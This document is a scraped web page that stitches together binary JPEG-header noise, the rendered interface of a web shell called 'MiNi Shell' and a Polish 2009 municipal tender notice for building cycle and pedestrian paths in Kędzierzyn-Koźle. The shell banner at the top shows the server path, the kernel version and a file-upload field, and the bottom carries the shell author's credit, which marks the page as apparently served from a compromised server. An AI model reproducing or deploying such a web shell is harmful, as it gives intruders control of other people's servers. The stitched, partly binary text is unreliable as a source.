JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090602/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090602/175392-N-2009.html

<p class="kh_header"><b>Kędzierzyn-Koźle: Budowa ścieżek rowerowych. Ścieżki rowerowe wspólnym produktem rekreacyjno-sportowym Ziemi Kędzierzyńsko-Kozielskiej. Budowa ciągów pieszo-jezdnych nr 4: od ul. Kozielskiej wzdłuż ul. Sobieskiego do ul. Partyzantów - część nr 1.</b><br>
<b>Numer ogłoszenia: 175392 - 2009; data zamieszczenia: 02.06.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kędzierzyn-Koźle, Urząd Miasta, Wydział Inwestycji i Remontów , ul. Piramowicza 32, 47-200 Kędzierzyn-Koźle, woj. opolskie, tel. 077 4050380, faks 077 4050379.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kedzierzynkozle.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa ścieżek rowerowych. Ścieżki rowerowe wspólnym produktem rekreacyjno-sportowym Ziemi Kędzierzyńsko-Kozielskiej. Budowa ciągów pieszo-jezdnych nr 4: od ul. Kozielskiej wzdłuż ul. Sobieskiego do ul. Partyzantów - część nr 1..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres robót objęty dokumentacją projektową 

Na odcinku od km 0 0,00 do km 0 113,8 zaprojektowano poszerzenie istniejącego
chodnika o średniej szerokości 0,5 m o następującej konstrukcji: koryto o głębokości
15 cm, warstwa odsączająca gr. 6 cm, warstwa podbudowy gr. 8 cm, nawierzchnia z
betonowej kostki brukowej gr. 6 cm szarej.
W rejonie z skrzyżowaniem z ul. Ligonia zaprojektowano przejazd obok przejścia dla
pieszych. W obrębie przejazdu dla rowerzystów i przejścia dla pieszych
zaprojektowano wymianę krawężnika, nowy krawężnik powinien wystawać od 0 do
2 cm. Szczegóły projektowanej organizacji ruchu przedstawiono w projekcie
organizacji ruchu.
Na odcinku od km 0 119,7 do km 0 247,2 istniejący chodnik pozostaje bez zmian.
W rejonie skrzyżowania z ul. Kościuszki zaprojektowano przejazd obok przejścia dla
pieszych. W obrębie przejazdu dla rowerzystów i przejścia dla pieszych
zaprojektowano wymianę krawężnika, nowy krawężnik powinien wystawać od 0 do 2
cm. Szczegóły projektowanej organizacji ruchu przedstawiono w projekcie
organizacji ruchu.
Na odcinku od km 0 256,2 do km 0 396,0 zaprojektowano poszerzenie istniejącego
chodnika o średniej szerokości 0,9 m o następującej konstrukcji: koryto o głębokości
15 cm, warstwa odsączająca gr. 6 cm, warstwa podbudowy gr. 8 cm, nawierzchnia z
betonowej kostki brukowej gr. 6 cm szarej.
W rejonie skrzyżowania z ul. Piotra Skargi zaprojektowano przejazd obok przejścia
dla pieszych. W obrębie przejazdu dla rowerzystów i przejścia dla pieszych
zaprojektowano wymianę krawężnika, nowy krawężnik powinien wystawać od 0 do
2 cm. Szczegóły projektowanej organizacji ruchu przedstawiono w projekcie
organizacji ruchu.
Na odcinku od km 0 404,0 do km 0 458,0 (ul. Piotra Skargi) zaprojektowano
poszerzenie istniejącego chodnika o średniej szerokości 1,0 m o następującej
konstrukcji: koryto o głębokości 15 cm, warstwa odsączająca gr. 6 cm, warstwa
podbudowy gr. 8 cm, nawierzchnia z betonowej kostki brukowej gr. 6 cm szarej.
Na odcinku drogi wewnętrznej od km 0 458,0 do km 0 588,0 zaprojektowano
wymianę istniejącej nawierzchni z masy mineralno-bitumicznej. Wymiana
nawierzchni polega na: frezowaniu warstwy ścieralnej o średniej głębokości 4 cm
(frezowanie powinno uwzględniać to, że nawierzchnia po wyrównaniu wykonanym z
masy mineralno-bitumicznej posiada daszkowy spadek 2%), ułożeniu warstwy
ścieralnej o grubości średnio 5 cm lecz nie mniej niż 3,5 cm. Należy wymienić
krawężnik na całej długości odcinka, od strony budynku 9 a-b. W miejscu połączenia
drogi wewnętrznej z ul. Piotra Skargi obniżyć krawężnik tak aby wystawał od 0 do 2
cm. Niweleta drogi nie ulegnie zmianie z wyjątkiem odcinka od km 0 458,0 do km
0 488,0 na którym należy zlikwidować istniejące zastoisko wody. W obmiarze
uwzględniono regulacje wysokościową chodnika od strony budynku 9 a-b na odcinku
przewidzianej korekty niwelety.  Na odcinku od km 0 588,0 do km 0 784,5 zaprojektowano wymianę chodnika oraz
poszerzenie istniejącego chodnika o następującej konstrukcji: koryto o głębokości 15
cm, warstwa odsączająca gr. 6 cm, warstwa podbudowy gr. 8 cm, nawierzchnia z
betonowej kostki brukowej gr. 6 cm szarej.
Na odcinku od km 0 571,6 do km0 624,9 należy przesadzić żywopłot.
W rejonie skrzyżowania przejazdu przez ul. Partyzantów zaprojektowano
przejazd obok przejścia dla pieszych. W obrębie przejazdu dla rowerzystów i
przejścia dla pieszych zaprojektowano wymianę krawężnika, nowy krawężnik
powinien wystawać od 0 do 2 cm. Szczegóły projektowanej organizacji ruchu
przedstawiono w projekcie organizacji ruchu.
Na odcinku od km 0 794,3 do km 0 829,4 zaprojektowano wykonanie ścieżki
o następującej konstrukcji: koryto o głębokości 30 cm, warstwa podbudowy gr. 15
cm, nawierzchnia z betonowej kostki brukowej gr. 8 cm szarej.

Inne konieczne dane wynikające ze specyfikacji i charakteru obiektu budowlanego.

Ścieżka na całym odcinku prowadzona jest poza nawierzchnią jezdni.
Odwodnienie - W projekcie nie przewiduje się zmiany sposobu odwodnienia,
pozostaje odwodnienie powierzchniowe. W tym celu tak zaprojektowano niweletę
ścieżki oraz jej przekroje poprzeczne aby wody opadowe mogły spływać na zieleńce
lub na nawierzchnię jezdni a stamtąd za pomocą wpustów ulicznych i przykanalików
do istniejącej kanalizacji burzowej.
Ścieżka na całym odcinku ma szerokość od 2,0 m do 3,5 m.

Wykonanie projektu organizacji ruch na czas wykonywania robót drogowych oraz zatwierdzenie do realizacji przez Powiatowy Zarząd Dróg w Kędzierzynie - Koźlu
Wykonanie docelowego oznakowania pionowego i poziomego zgodnie z Projektem docelowej organizacji ruchu.
Wykonanie wycinki drzew i nasadzeń zgodnie z Inwentaryzacją drzewa i krzewów oraz decyzją pozwolenia na wycinkę, którą Zamawiający przekaże podczs przekazania placu budowy.
Wykonanie zadania obejmuje dodatkowo:
a)	Kompleksową obsługę geodezyjną wraz z powykonawczą inwentaryzacją geodezyjną w 3 kpl. (w tym 1 kpl. na nośniku elektronicznym) 
b)	Wykonanie dokumentacji powykonawczej.
c)	Organizację, zagospodarowanie i likwidację placu budowy.
d)	Sporządzenie planu bezpieczeństwa i ochrony zdrowia, jeżeli odrębne przepisy wymagają sporządzenia takiego planu.
e)	Organizację ruchu i oznakowanie budowy.
f)	Zapewnienie przez Wykonawcę dowozu samochodem do czterech przedstawicieli Zamawiającego do trzech razy w tygodniu, z miejsca wskazanego przez przedstawiciela Zamawiającego na plac                 budowy wraz z powrotem na miejsce wskazane przez przedstawiciela Zamawiającego w granicach Gminy Kędzierzyn-Koźle.
g)	Przy pracach z zakresu kanalizacji: kamerowanie sieci i uwzględnienie wymogów MWiK.
h)	Zajęcie pasa drogowego.
i)	Remonty i naprawę zniszczonej nawierzchni w ulicach i chodnikach.
j)	Próby i odbiory z udziałem wymaganych instytucji państwowych, inwestora i użytkownika.
k)	Wykonanie zaleceń pokontrolnych m.in. takich instytucji jak organy: PIP, PIS, PSP.
l)	Zebranie odpadów powstałych w wyników realizacji przedmiotu zamówienia i przekazanie ich do odzysku, unieszkodliwienia lub składowania. Powstałe w ten sposób odpady - w tym również                 wszelkiego rodzaju nadziemne, podziemne, nieorganiczne i organiczne pozostałości typu gruz, złom, pnie, korzenie, karpiny itp. - należy bez zbędnej zwłoki wywieźć na Miejskie Składowisko                 Odpadów lub przekazanie przedsiębiorcy posiadającemu zezwolenie na transport odpadów zgodnie z obowiązującymi przepisami. Składowanie w rejonie placu budowy w miejscu wskazanym przez                 Zamawiającego zdemontowanych materiałów nadających się do odzysku jest możliwe na okres nie dłuższy niż termin realizacji przedmiotu zamówienia. Wykonawca jest zobowiązany przedstawić                 Zamawiającemu dokumenty potwierdzające złożenie wytworzonych odpadów na Miejskie Składowisko Odpadów lub przekazanie  przedsiębiorcy posiadającemu zezwolenie na transport odpadów. 
m)	W przypadkach gdy konieczna jest wycinka drzew, pocięcie ich na odcinki o dł. 120 cm i uformowanie w stosy na placu budowy lub w jego bezpośrednim sąsiedztwie w miejscu wskazanym przez                 Zamawiającego.
n)	Przywrócenie terenu po zakończeniu robót do stanu pierwotnego.
o)	Wykonanie Projektu Organizacji Ruchu na czas prowadzenia robót drogowych wraz z zatwierdzeniem j przez Powiatowy Zarząd Dróg w Kędzierzynie - Koźlu..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.53-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 90.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Akceptacja projektu umowy.,
Zaakceptowanie bez zastrzeżeń i uwag załączonego do SIWZ projektu umowy (z załącznikiem) w tym zawartych w niej warunków płatności. ,

Niepodleganie wykluczeniu oraz posiadanie możliwości ubiegania się o zamówienie.,
Złożenie podpisanego oświadczenia. ,

Niezbędna wiedza i doświadczenie.,
Posiadanie niezbędnej wiedzy i doświadczenia oraz potencjału technicznego, a także dysponowanie osobami zdolnymi do wykonywania zamówienia. Wykonawca musi spełniać łącznie następujące warunki:
- Wykazać się wykonaniem w okresie ostatnich 5 lat tj. od 02.06.2004 do 01.06.2009, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - robót w zakresie robót grogowych obejmujących ciągi piesze - jezdne z kostki brukowej betonowej oraz mieszanek mineralno - bitumicznych na wartość łączną co najmniej 600.000,00 zł,

Posiadanie uprawnień do wykonywania określonej działalności.,
Posiadanie uprawnień wykonywania określonej działalności lub czynności  oraz nie podleganie wykluczeniu na podstawie art. 24 ust. Ustawy Prawo zamówień publicznych.,

Sytuacja ekonomiczna i finansowa.,
Znajdowanie się w sytuacji ekonomicznej i  finansowej zapewniającej wykonanie zamówienia.
- Wykonawca zobowiązany jest posiadać ubezpieczenie od odpowiedzialności cywilnej prowadzonej działalności gospodarczej na kwotę sumy ubezpieczenia (na dzień złożenia oferty) nie mniejszą niż 100.000,00 zł i ważną na dzień złożenia oferty, z zastrzeżeniem, iż zobowiązanie, ubezpieczyciela wynikające z umowy ubezpieczenia, nie może być przedmiotem cesji na rzecz osób trzecich.
,

Spółki cywilne lub konsorcjum.,
W przypadku składania oferty przez spółki cywilne oraz Wykonawców wspólnie ubiegających się o udzielenie zamówienia  (konsorcjum) obowiązują następujące warunki:
- ustanowienie Pełnomocnika reprezentującego wspólników spółki lub reprezentującego Wykonawców wspólnie ubiegających się o udzielenie zamówienia w postępowaniu lub w postępowaniu i zawarciu umowy.,

Zgodność złożonej oferty z SIWZ.,
Złożona oferta spełnia wymogi SIWZ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Projekt umowy.,
Zaakceptowany bez poprawek i zastrzeżeń projekt umowy o roboty budowlane (druk Nr 4 SIWZ) i karta gwarancyjna (załącznik nr 1 do umowy) podpisany przez osobę reprezentującą Wykonawcę z podaniem imienia i nazwiska.,

Oświadczenie w związku z art. 22 ust.1 i art. 24 ust. 1 i 2 Ustawy Pzp.,
- Oświadczenie Wykonawcy w związku z art. 22 ust.1 i art. 24 ust. 1 i 2  ustawy Pzp o spełnieniu warunków udziału w postępowaniu (sporządzony wg wzoru druku Nr 2 SIWZ). W przypadku Wykonawców występujących wspólnie oświadczenie to podpisuje Pełnomocnik.,

Wykaz wykonanych robót.,
- Wykaz (sporządzony wg wzoru druku nr 3 SIWZ) robót wykonanych w okresie od 02.06.2004 do 01.06.2009, z podaniem ich wartości, przedmiotu, dat wykonania oraz zamawiających (odbiorców) wraz z potwierdzeniem przez nich (na wykazie lub odrębnymi referencjami), że roboty te zostały wykonane należycie. Referencje obowiązkowo muszą zawierać dane, jakie występują w kolumnach wykazu. 
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oceniane będzie ich łączne posiadanie niezbędnej wiedzy i doświadczenia  do wykonania zamówienia, dlatego w tym celu dokumenty ma obowiązek złożyć ten lub ci Wykonawcy, którzy w imieniu wszystkich wykazywać będą spełnienie tego warunku. ,

Odpis z rejestru lub wpis do ewidencji.,
- Aktualny odpis z rejestru lub zaświadczenie o wpisie do ewidencji potwierdzające, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności odpowiadającej przedmiotowi zamówienia oraz, że w stosunku do wykonawcy nie ogłoszono upadłości ani nie wszczęto postępowania likwidacyjnego, wystawionego (zaktualizowanego) nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia powyższe dokumenty muszą być złożone dla każdego z nich,

Polisa OC.,
- Polisa lub inny dokument ubezpieczenia stwierdzający, że wykonawca jest ubezpieczony od OC w zakresie prowadzonej działalności gospodarczej na kwotę sumy ubezpieczenia (na dzień złożenia oferty) nie mniejszą niż 100.000,00 zł W polisie lub dokumencie ubezpieczeniowym musi być jednoznaczny zapis, że jest to ubezpieczenie od prowadzonej działalności gospodarczej. W innym przypadku należy do dokumentu ubezpieczeniowego dołączyć ogólne warunki umowy ubezpieczenia, które potwierdzają, że Wykonawca jest ubezpieczony w zakresie OC od prowadzonej działalności gospodarczej. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oceniane będzie ich łączne znajdowanie się w sytuacji ekonomicznej i finansowej zapewniające wykonanie zamówienia. Wszyscy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mają obowiązek złożyć dokumenty w zakresie ubezpieczenia,

Pełnomocnictwo.,
Pełnomocnictwo udzielone pełnomocnikowi (wspólnikowi) reprezentującemu spółkę cywilną lub pełnomocnikowi reprezentującemu Wykonawców wspólnie ubiegających się o udzielenie zamówienia wg wzoru określonego w druku Nr  7 SIWZ.,

Formularz oferty.,
Oferta wypełniona ściśle z wymogami SIWZ na załączonych drukach podpisanych przez upełnomocnionego przedstawiciela Wykonawcy określonego aktem rejestrowym z podaniem imienia i nazwiska..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 90</li>
<li>2 - Termin wykonania - 10</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.kedzierzynkozle.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Zamawiającego Wydział Inwestycji i Remontów Urzędu Miasta Kędzierzyn-Koźle, ul. Piramowicza 20, pokój nr 205.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.06.2009 godzina 11:00, miejsce: w siedzibie Zamawiającego Wydział Inwestycji i Remontów Urzędu Miasta Kędzierzyn-Koźle, ul. Piramowicza 20, pokój nr 207.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com